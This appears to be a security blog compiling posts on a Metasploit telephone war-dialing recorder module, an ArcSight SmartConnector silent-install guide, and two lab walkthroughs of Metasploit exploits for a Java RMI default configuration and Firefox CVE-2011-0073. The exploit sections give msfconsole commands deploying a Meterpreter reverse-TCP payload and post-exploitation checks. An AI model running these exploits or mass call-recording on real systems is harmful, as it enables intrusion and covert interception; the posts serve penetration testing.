Metasploit IAX Telephone Line Voice Scanner Auxiliary module


HD Moore, Rapid7 CSO and creator of Metasploit, has released a new auxiliary module. This module, named “Telephone Line Voice Scanner”, lets you dial a range of phone numbers and record audio from each answered call. The module only supports IAX VoIP communication. IAX is mostly used by VoIP providers running the open source PBX Asterisk.

You can use this module by loading “auxiliary/scanner/voice/recorder”.

The module has the following options :

  • CALL_TIME : The maximum time in seconds to spend on each call (ringing + recording). The default is 52 seconds.
  • IAX_CID_NAME : Your caller ID name. Optional by default, but some IAX providers require it.
  • IAX_CID_NUMBER : Your caller ID number. This can be a phone number or your login, depending on your provider.
  • IAX_HOST : Your IAX registration server.
  • IAX_USER : Your registration user name (most of the time the same as for SIP).
  • IAX_PASS : Your registration password (most of the time the same as for SIP).
  • OUTPUT_PATH : A local directory to store the resulting audio files.
  • TARGETS : A telephone number, or a list of telephone numbers separated by commas. The phone numbers shouldn’t contain spaces.

Once the module options are configured, you can run it. As you can see in the following screenshot, the saved file is named after the phone number, with a “.raw” extension.

You can also see when the called phone is ringing and when someone or something has answered.

To listen to the “.raw” file you will need to convert it to “.wav” or “.mp3” format. Under Mac OS X I have used Switch Sound File Converter.
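The conversion can also be scripted. This is an added Python example, not part of the original post or of the Metasploit module: it wraps the headerless “.raw” capture in a WAV container and reports each file's duration and peak level so that recordings of silence are easy to spot. The sample format (8 kHz, 16-bit signed little-endian PCM, mono) is an assumption; adjust the constants if your captures sound wrong.

```python
import math
import struct
import wave
from io import BytesIO
from pathlib import Path

# Assumed layout of the module's ".raw" files (assumption, not from the post):
# 8 kHz, 16-bit signed little-endian PCM, mono.
SAMPLE_RATE = 8000
SAMPLE_WIDTH = 2   # bytes per sample
CHANNELS = 1


def duration_seconds(pcm):
    """Length of a headerless PCM buffer in seconds."""
    frame_size = SAMPLE_WIDTH * CHANNELS
    if len(pcm) % frame_size:
        raise ValueError("buffer is not a whole number of frames")
    return len(pcm) // frame_size / SAMPLE_RATE


def peak_amplitude(pcm):
    """Largest absolute sample; a peak near 0 means the call recorded silence."""
    samples = struct.unpack("<%dh" % (len(pcm) // 2), pcm)
    return max((abs(s) for s in samples), default=0)


def pcm_to_wav_bytes(pcm):
    """Wrap raw PCM in a standard 44-byte WAV header so any player can open it."""
    buf = BytesIO()
    with wave.open(buf, "wb") as wav:
        wav.setnchannels(CHANNELS)
        wav.setsampwidth(SAMPLE_WIDTH)
        wav.setframerate(SAMPLE_RATE)
        wav.writeframes(pcm)
    return buf.getvalue()


def convert_directory(output_path):
    """Convert every <number>.raw in OUTPUT_PATH to <number>.wav.
    Returns {number: (duration_s, peak)} so that silent captures stand out."""
    report = {}
    for raw in sorted(Path(output_path).glob("*.raw")):
        pcm = raw.read_bytes()
        raw.with_suffix(".wav").write_bytes(pcm_to_wav_bytes(pcm))
        report[raw.stem] = (duration_seconds(pcm), peak_amplitude(pcm))
    return report


def constructed_tone(seconds=1.0, freq=440.0, amp=8000):
    """Constructed stand-in for a capture: a sine tone in the assumed format."""
    n = int(seconds * SAMPLE_RATE)
    samples = [round(amp * math.sin(2 * math.pi * freq * i / SAMPLE_RATE)) for i in range(n)]
    return struct.pack("<%dh" % n, *samples)
```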

ArcSight SmartConnectors silent mass installation


With your free ArcSight L750MB Logger you can mass install ArcSight SmartConnectors with a silent properties configuration file. If you have to install, for example, 10 or more Syslog SmartConnectors, you will save time by reading this blog post.

First of all you need to create a properties configuration file template by installing a typical SmartConnector with typical settings. Just start installing, for example, a Windows Syslog SmartConnector as described in my previous post “Syslog SmartConnector and Snare installation”.

During the installation process, when you see the following screen, just click the “Cancel” button.

Open a command prompt, go to the SmartConnector installation directory (e.g. C:\Program Files\ArcSightSmartConnectors) and execute the following command.

The “recorderui” start option lets you record the installation process in order to create a mass installation properties configuration file.

The installation wizard will ask you to select a “Silent Properties File Name” and a typical “Installation Target Folder”.

Create an “installer.properties” file on your desktop and select it in the wizard. Also select a default installation folder, for example “D:\ArcSightSmartConnectors”. Now you can continue your typical SmartConnector configuration.

You can examine your “installer.properties” file and adapt the properties to your needs.

For each SmartConnector you have to install, you need to adapt the following in your “installer.properties” file :

- The SmartConnector name : AgentDetailsPanel.agentname
- The optional SmartConnector location : AgentDetailsPanel.agentlocation
- The optional device location : AgentDetailsPanel.devicelocation
- The optional comment : AgentDetailsPanel.comment

Now you can install all your SmartConnectors in silent mode. If a properties file named “installer.properties” resides in the same directory as the installer, it will automatically be used, overriding all other command line options, unless the “-f” option is used to point to another valid properties file.

The “-f” option can be used with the following command line.
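To produce one properties file per SmartConnector from the recorded template, here is an added Python example (not part of the original post or of ArcSight's tooling). It rewrites only the four AgentDetailsPanel keys listed above and leaves every other recorded line untouched; the template excerpt and the connector names are constructed, and the key=value line format is an assumption about the recorded file.

```python
import re
from pathlib import Path

# The keys the post says must change for each SmartConnector.
PER_CONNECTOR_KEYS = (
    "AgentDetailsPanel.agentname",
    "AgentDetailsPanel.agentlocation",
    "AgentDetailsPanel.devicelocation",
    "AgentDetailsPanel.comment",
)

# Constructed excerpt standing in for a recorded installer.properties
# (a real recorded file holds many more keys; backslashes are doubled as
# Java properties files require).
TEMPLATE = r"""# recorded by the wizard (constructed sample)
USER_INSTALL_DIR=D:\\ArcSightSmartConnectors
AgentDetailsPanel.agentname=syslog-template
AgentDetailsPanel.agentlocation=
AgentDetailsPanel.devicelocation=
AgentDetailsPanel.comment=recorded template
"""


def render_properties(template, overrides):
    """Return the template with the given key=value lines replaced.
    Comments, blank lines and unrelated keys are copied verbatim."""
    seen, out = set(), []
    for line in template.splitlines():
        key, sep, _ = line.partition("=")
        key = key.strip()
        if sep and key in overrides:
            out.append("%s=%s" % (key, overrides[key]))
            seen.add(key)
        else:
            out.append(line)
    missing = set(overrides) - seen
    if missing:
        raise KeyError("keys not present in template: %s" % sorted(missing))
    return "\n".join(out) + "\n"


def build_all(template, connectors):
    """One rendered file per connector dict (agentname is mandatory).
    Returns {filename: text}; pass each written file to the installer with -f."""
    files = {}
    for overrides in connectors:
        name = overrides["AgentDetailsPanel.agentname"]
        if not re.fullmatch(r"[A-Za-z0-9_.-]+", name):
            raise ValueError("connector name %r is not filename-safe" % name)
        fname = "installer-%s.properties" % name
        if fname in files:
            raise ValueError("duplicate connector name %r" % name)
        files[fname] = render_properties(template, overrides)
    return files


def write_all(files, directory):
    """Write the rendered files into a directory and return their names."""
    directory = Path(directory)
    directory.mkdir(parents=True, exist_ok=True)
    for fname, text in files.items():
        (directory / fname).write_text(text)
    return sorted(files)
```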

Java RMI Server Insecure Default Configuration Java Code Execution


Timeline :

Vulnerability discovered by mihi
Metasploit exploit released the 2011-07-15

PoC provided by :

mihi

Reference(s) :

Oracle Java RMI documentation

Affected version(s) :

All JSE versions

Tested on Windows XP SP3 with :

JSE 7 (build 1.7.0-b147)

Description :

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

Commands :

On windows target box :

cd C:\Program Files\Java\jre7\bin
start rmiregistry.exe

On Metasploit box :

use exploit/multi/misc/java_rmi_server
set RHOST 192.168.178.48
set SRVHOST 192.168.178.21
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2011-0073 : Mozilla Firefox nsTreeRange Dangling Pointer Vulnerability


Timeline :

Vulnerability discovered by regenrecht
Vulnerability reported to vendor by ZDI the 2011-02-02
Coordinated public release of advisory the 2011-05-09
Metasploit exploit released the 2011-07-10

PoC provided by :

regenrecht
xero

Reference(s) :

CVE-2011-0073
OSVDB-72087
ZDI-11-157
MFSA2011-13

Affected version(s) :

Firefox 3.6.16 and below
Firefox 3.5.18 and below
Seamonkey 2.0.13 and below

Tested on Windows XP SP3 with :

Firefox 3.6.9

Description :

This module exploits a code execution vulnerability in Mozilla Firefox 3.6.x and 3.5.x found in nsTreeSelection. By overwriting a subfunction of invalidateSelection it is possible to free the nsTreeRange object that the function currently operates on. Any further operations on the freed object can result in remote code execution. Utilizing the call setup the function provides it’s possible to bypass DEP without the need for a ROP. Sadly this exploit is still either dependent on Java or bound by ASLR because Firefox doesn’t employ any ASLR-free modules anymore.

Commands :

use exploit/windows/browser/mozilla_nstreerange
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig
